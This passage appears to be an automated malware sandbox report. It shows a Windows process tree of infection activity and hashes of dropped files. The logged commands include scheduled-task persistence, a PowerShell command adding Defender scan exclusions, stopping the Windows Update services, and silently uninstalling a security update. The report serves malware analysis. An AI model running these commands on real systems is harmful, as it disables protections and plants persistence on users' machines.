                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1820 -ip 1820
                                                            1⤵
                                                              PID:3752
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1820 -ip 1820
                                                              1⤵
                                                                PID:2796
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                1⤵
                                                                • Creates scheduled task(s)
                                                                PID:4660
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1820 -ip 1820
                                                                1⤵
                                                                  PID:2236
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1820 -ip 1820
                                                                  1⤵
                                                                    PID:516
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1820 -ip 1820
                                                                    1⤵
                                                                      PID:3700
                                                                    • C:\Windows\SysWOW64\chcp.com
                                                                      chcp 1251
                                                                      1⤵
                                                                        PID:4512
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1820 -ip 1820
                                                                        1⤵
                                                                          PID:2260
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1820 -ip 1820
                                                                          1⤵
                                                                            PID:3792
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1820 -ip 1820
                                                                            1⤵
                                                                              PID:5056
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1820 -ip 1820
                                                                              1⤵
                                                                                PID:1052
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1820 -ip 1820
                                                                                1⤵
                                                                                  PID:2508
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5016 -ip 5016
                                                                                  1⤵
                                                                                    PID:2260
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5016 -ip 5016
                                                                                    1⤵
                                                                                      PID:5116
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5016 -ip 5016
                                                                                      1⤵
                                                                                        PID:3952
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5016 -ip 5016
                                                                                        1⤵
                                                                                          PID:1580
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5016 -ip 5016
                                                                                          1⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3004
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5016 -ip 5016
                                                                                          1⤵
                                                                                            PID:2776
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5016 -ip 5016
                                                                                            1⤵
                                                                                              PID:3228
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5016 -ip 5016
                                                                                              1⤵
                                                                                                PID:3444
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5016 -ip 5016
                                                                                                1⤵
                                                                                                  PID:2236
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1168 -ip 1168
                                                                                                  1⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1900
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1168 -ip 1168
                                                                                                  1⤵
                                                                                                    PID:2128
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1168 -ip 1168
                                                                                                    1⤵
                                                                                                      PID:1580
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1168 -ip 1168
                                                                                                      1⤵
                                                                                                        PID:3604
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1168 -ip 1168
                                                                                                        1⤵
                                                                                                          PID:4636
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1168 -ip 1168
                                                                                                          1⤵
                                                                                                            PID:968
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4440 -ip 4440
                                                                                                            1⤵
                                                                                                              PID:4732
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1168 -ip 1168
                                                                                                              1⤵
                                                                                                                PID:5100
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1168 -ip 1168
                                                                                                                1⤵
                                                                                                                  PID:3848
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1168 -ip 1168
                                                                                                                  1⤵
                                                                                                                    PID:5028
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1168 -ip 1168
                                                                                                                    1⤵
                                                                                                                      PID:1912
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1168 -ip 1168
                                                                                                                      1⤵
                                                                                                                        PID:3532
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1168 -ip 1168
                                                                                                                        1⤵
                                                                                                                          PID:1256
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1168 -ip 1168
                                                                                                                          1⤵
                                                                                                                            PID:5040
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BC3B.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BC3B.exe
                                                                                                                            1⤵
                                                                                                                              PID:5056
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3284
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1168 -ip 1168
                                                                                                                              1⤵
                                                                                                                                PID:4776
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1168 -ip 1168
                                                                                                                                1⤵
                                                                                                                                  PID:1808
                                                                                                                                • C:\Windows\windefender.exe
                                                                                                                                  C:\Windows\windefender.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:3952
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                  1⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  PID:4056
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\b0ab8daf-bfeb-4b59-ae20-9db51ac7eedd" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                    2⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:5088
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\CA85.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:512
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\CA85.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4988
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 568
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:4724
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CA85.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:2360
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4988 -ip 4988
                                                                                                                                    1⤵
                                                                                                                                      PID:412
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:4440
                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5056
                                                                                                                                    • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                      C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:3064
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        explorer.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1724
                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:2940
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            2⤵
                                                                                                                                              PID:2344
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                              2⤵
                                                                                                                                                PID:3380
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                2⤵
                                                                                                                                                  PID:4656
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1004
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:2096
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:3592
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:2732
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5100
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:2544
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2000
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:960
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3472
                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4116
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E2FF.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E2FF.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:1256
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3156
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E9B7.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E9B7.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:3368
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:348
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3976
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\43EE.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\43EE.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1392
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4132
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
                                                                                                                                                                  work.exe -priverdD
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:852
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:4968
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5EE9.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5EE9.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1004
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\onefile_1004_133507481729766842\stub.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5EE9.exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:4816
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5116
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3172
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1524
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic csproduct get uuid
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2396
                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                      tasklist
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                      PID:404
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1168 -ip 1168
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3988
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1168 -ip 1168
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3336
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ajabbsc
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\ajabbsc
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:3784
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1168 -ip 1168
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1524
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1168 -ip 1168
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4256
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1168 -ip 1168
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4220
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1168 -ip 1168
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1192
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1168 -ip 1168
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1552
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1168 -ip 1168
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4968
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1168 -ip 1168
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2012
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4928 -ip 4928
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1648
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4928 -ip 4928
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3060
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4928 -ip 4928
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4596
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4928 -ip 4928
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1528
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4928 -ip 4928
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4716
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4928 -ip 4928
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2424
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4928 -ip 4928
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3620
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4928 -ip 4928
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2668
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4928 -ip 4928
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3020

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\ProgramData\AKFIDHDGIEGCAKFIIJKFCBFBFI

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          17KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2afedf5e14ac01dc843c713a04bbb2b6

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          2e1e29587a3ebd6a5bfc12d4e5f61e41c22b6303

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          309abff51f30d2d6e8fb8077443c2b2fcb989bf37c39a2ff1f91446711654147

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1743742e44ffecc3e88f737d417bbe080bcf493546362d574ca1430c762d1688c6ace1e34d6250c810cfae343faaf44fc79977025578cfa462fd1c3561232198

                                                                                                                                                                                                        • C:\ProgramData\Are.docx

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          11KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                        • C:\ProgramData\CAFIJKFH

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          92KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          92be7d444b8f6922a7ab205f66109c15

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          25ea6a81f508348a61b7f4f668186069b00ccb8d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          89121f65705e315dd36be848aac783b0cfc307a6848392af9346f1f288e474e9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8c10adcc6f1dbe3d5c9022d303f2c6cc68c458949a8997f3bfcf5ca9a3620d1e7400b46ec36727b9c6d760d108ea889aa97a0ae9d505768822b6a112793bbd1

                                                                                                                                                                                                        • C:\ProgramData\DBKEGCAE

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          114KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          20ac2a9596f54be808c028360b64ed86

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0b41bef2f1d3269d63763d002781844af11d929a

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          96cca4b6308386c1aca605cd363f2be02f7f9680dcd1df0c6e6b4114cca339fc

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          ab245fb1b0263f50947010f4b4dee1e2c65c8668066e0a3ca389db15034283427655a45fccdff5d07571705a51f62f2ddf7f10f591449ba8d0ab78aaa274a131

                                                                                                                                                                                                        • C:\ProgramData\freebl3.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          200KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          04ff39f420028a0d96b3a6630833dc29

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5e4aa21e4952adfbdffdf9d220b14f27e300d225

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          106492bc6dc77e64b0cf38a4b967e02230b116c5807a5dec5359e0c03f9d0de4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c852679428cf876e28da538b38493856a2476385d9f102c971fa9242480f01ecf1b86f2039b668d4c0637bb4e51919ba5bb61cddf5a49e539609e134e6ed25f6

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          178f19af3729decc183747dbd2a2b8b4

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9289c500809931735a13f7a5277d1ebe608497dd

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a34639e55fe61a443a34477106f7d4c672f77170557fddb8983159dc1746131f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fd2c62a6926173df1a833d445e9da719a8b3d80002909b390e5dcc16ad979f139e91b0784e14b5f49c245548584f1038ec0d2bb44d82d4e79b138519e7a9f635

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          44KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bc960843ed39be4d8ccb0e07247cd251

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d113a9c0a5643167e5172a4ba3ce97745498e79a

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f65a4b24144c8abf1f07792d5f21f3163b17ab2913c22025dd5a9c0d340c20ef

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f04594ccce0c7d6d827ae6d77271ff980c00c259c340158ae2076d54eb2e25be4f94ab38912bacbd5bbee7ac255e979aa9a7d33b0af38014295968b48e624399

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          21KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          194fdf559767e8768a18db59960c980e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          eb9f9c0653d56ea15280a5c8f95f0706423ae88b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          bd777368214b320f358c506d0cfb2a91e45656b975b35f48cf26082ceda97c38

                                                                                                                                                                                                          SHA512

